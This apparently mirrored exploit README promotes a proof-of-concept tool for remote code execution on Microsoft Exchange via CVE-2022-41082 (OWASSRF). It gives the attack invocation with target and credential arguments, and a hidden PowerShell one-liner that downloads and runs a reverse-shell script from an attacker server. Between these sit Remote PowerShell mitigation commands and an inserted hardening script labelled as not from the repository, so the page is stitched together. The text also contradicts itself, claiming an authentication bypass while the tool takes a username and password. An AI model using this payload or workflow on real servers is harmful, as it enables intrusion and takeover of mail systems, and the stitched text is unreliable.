## https://sploitus.com/exploit?id=BF63DB79-1626-5C84-8886-54147C0FF64D
# CVE-2022-41082
This repository contains a proof-of-concept (PoC) tool for exploiting the **OWASSRF** vulnerability (CVE-2022-41082) in Microsoft Exchange servers. The exploit allows attackers to execute arbitrary commands on the server, potentially compromising the system.
## Overview
The tool leverages an **OWASSRF** vulnerability to bypass authentication and gain remote code execution (RCE) on an Exchange server. By exploiting this vulnerability, an attacker can execute commands as if they were an authenticated user, leading to severe security implications.
### How It Works
1. **Authentication Bypass**: The tool connects to the target Exchange server, bypassing authentication mechanisms using crafted requests.
2. **Remote Code Execution**: After successfully logging in, the tool opens a session that allows command execution on the Exchange server.
3. **Executing Commands**: Users can specify commands to be executed on the server, allowing for various actions, including file manipulation, network operations, or establishing reverse shells.
### Important Note
When using this tool, **please** keep your existing Exchange Management Shell session open. After disabling Remote PowerShell access for other users, make sure it stays enabled for at least one account; otherwise you may lose Management Shell access on all Exchange servers.
## Commands for Managing PowerShell Access
Here are some useful PowerShell commands to check and manage who has access:
### Check PowerShell Access
To see which users have Remote PowerShell access and which do not, run:
```powershell
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $false'
```
### Disable PowerShell Access for All Users
**Warning:** Be careful not to close the Exchange Management Shell window unless you add at least one user back.
You can disable PowerShell access for all users using the following commands:
```powershell
# Collect every user who currently has Remote PowerShell enabled ...
$user = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
# ... and disable it for each of them
$user | foreach {Set-User -Identity $_ -RemotePowerShellEnabled $false}
```
Or use a single command to achieve the same result:
```powershell
Get-User -ResultSize Unlimited | Set-User -RemotePowerShellEnabled $false
```
### Re-enabling Access for a Specific User
To grant Remote PowerShell access to a specific user, run:
```powershell
Set-User "guest" -RemotePowerShellEnabled $true
```
### Workaround for Losing PowerShell Access
If you lose PowerShell access for all users, you can create a new mailbox user with administrator rights. The new account is not affected by the Remote PowerShell restriction already applied to existing users, so it can be used to open the Exchange Management Shell again.
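The check, disable and re-enable steps above are easy to get wrong in the order the Important Note warns about (disabling everyone, including the account running the shell). The script below is an added example, not part of the PoC repository, that combines the three steps into one guarded change: it resolves an explicit allowlist of administrator accounts first, refuses to continue if none of them exist, enables Remote PowerShell for the allowlisted accounts before touching anyone else, and only then disables it for the rest. The allowlist names `exadmin01` and `exadmin02` are placeholders, and `$DryRun` is a variable introduced here to drive `-WhatIf`; everything else uses the same `Get-User`/`Set-User` cmdlets shown above.

```powershell
# Added example (not from the original repository): restrict Remote PowerShell access
# to an allowlist of admin accounts without ever leaving zero accounts enabled.
# Run this inside an already-open Exchange Management Shell session.

# Placeholder identities; replace with the real administrator accounts to keep.
$AllowList = @('exadmin01', 'exadmin02')

# Start with $true to preview the change (-WhatIf); set to $false to apply it.
$DryRun = $true

# Resolve every allowlisted identity before changing anything.
$Keep = foreach ($name in $AllowList) {
    $u = Get-User -Identity $name -ErrorAction SilentlyContinue
    if ($null -eq $u) {
        Write-Warning "Allowlisted account '$name' was not found and will be skipped"
    } else {
        $u
    }
}

# Guard against the failure mode in the Important Note: if nobody would keep access, stop.
if (-not $Keep) {
    throw 'No allowlisted account resolved; refusing to disable Remote PowerShell for everyone.'
}

# Step 1: make sure the allowlisted accounts are enabled *before* anyone is disabled,
# so there is always at least one account with Remote PowerShell access.
foreach ($u in $Keep) {
    Set-User -Identity $u.Identity -RemotePowerShellEnabled $true -WhatIf:$DryRun
}

# Step 2: disable every other user who currently has it enabled.
$KeepDNs = $Keep | ForEach-Object { $_.DistinguishedName }
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true' |
    Where-Object { $KeepDNs -notcontains $_.DistinguishedName } |
    ForEach-Object {
        Set-User -Identity $_.Identity -RemotePowerShellEnabled $false -WhatIf:$DryRun
    }

# Step 3: report who still has access, for the change record.
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true' |
    Select-Object Name, SamAccountName, RemotePowerShellEnabled |
    Format-Table -AutoSize
```

Run it once with `$DryRun = $true` and read the `What if:` lines to confirm that the allowlisted accounts are the only ones left enabled, then flip `$DryRun` to `$false`. Comparing by `DistinguishedName` rather than display name avoids disabling an admin account because two users share a name.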
## Using the PoC Tool
### Requirements
- Python 3.x
- Required libraries (install via `pip` if necessary)
### Running the Tool
To execute the PoC tool, run the following command:
```bash
python3 poc.py -H <target_IP> -u <username> -p <password> -c <command_file>
```
Replace `<target_IP>`, `<username>`, `<password>`, and `<command_file>` with your specific values.
### Example Command for Reverse Shell
You can modify the command in your `cmd_file` to include a reverse shell payload. For example:
```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://your-malicious-server.com/reverse.ps1')"
```
This command will download and execute a PowerShell script from your server, giving you a reverse shell.
## References
For more information about the OWASSRF vulnerability and the PoC code, see the following links: [OWASSRF CVE-2022-41082 PoC](https://github.com/balki97/OWASSRF-CVE-2022-41082-POC) and https://www.youtube.com/watch?v=c2DZYP6jc7g